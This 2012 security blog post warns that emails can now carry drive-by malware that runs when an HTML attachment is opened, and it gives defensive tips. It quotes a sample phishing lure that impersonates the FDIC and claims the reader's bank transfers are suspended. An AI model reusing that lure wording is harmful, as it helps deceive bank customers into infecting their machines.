Wednesday, February 1, 2012

‘Drive-by-Download’ Malware Attacks Now Delivered via Email

Malicious Emails Make Your PC Sick!There’s a good chance you’ve been advised not to click links or download malicious file attachments inside emails from unknown (and untrusted) sources.

Otherwise, you may wind up with a nasty virus or worm wreaking havoc on your computer, stealing data, displaying advertisements or possibly granting an attacker remote control of your machine. And that’s just the tip of the iceberg.

In recent years, security professionals have warned users to remain vigilant and tread the internet carefully. Failure in doing so may lead to similar results, only the malware delivery was via drive-by-download.

Drive-by-downloads are the silent-but-deadly attacks carried out when a user visits a seemingly innocuous website that exploits system vulnerabilities within the visitor’s computer in order to install malware. Unless the PC is patched and protected by antivirus, there’s a strong chance the machine will instantly be infected – all without any knowledge of the user.

Now users have another danger to look out for: drive-by-downloads delivered by email.

Researchers at Eleven, an email security firm based in Germany, have discovered a sinister email campaign that downloads malware when the emails are opened (or potentially previewed) in the email client.

“Previous malware e-mails required the user to click on a link or open an attachment for the PC to be infected,” the company wrote in a press release issued last week. “The new generation of e-mail-borne malware consists of HTML e-mails which contain a JavaScript which automatically downloads malware when the e-mail is opened.”

According to Eleven, the spam messages currently harboring this new threat are rigged to appear as if they’re coming from the Federal Deposit Insurance Corporation (FDIC), complete with a spoofed sender’s address at

Driveby Download Email

Subject: Banking security update
Dear clients,

Your Wire and ACH transactions have been temporarily suspended. Please open the attached document for more information.

Best regards,
Online security department
Federal Deposit Insurance Corporation

Attached file: Suspended_Bank_Account_N8465797.htm

If the target’s email client renders the HTML, the malicious code embedded will be executed and will attempt to download malware on the PC. Meanwhile, all the user sees is a message saying, “Loading…Please wait…”

Protecting Your Computer from ‘Drive-by’ Emails

In light of this new threat, users are being advised to take the following precautions:

  • Update your email preferences to prevent HTML emails from automatically being displayed and opt for the option of displaying emails in pure-text format only if possible. The attack will only be carried out if the HTML file is opened.

  • Make sure that your email client is protected by a comprehensive spam and malware filter.

  • Verify that your PC is patched with any necessary system updates and protected by antivirus software. Also be sure to double-check that the antivirus definitions are current.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

No comments:

Post a Comment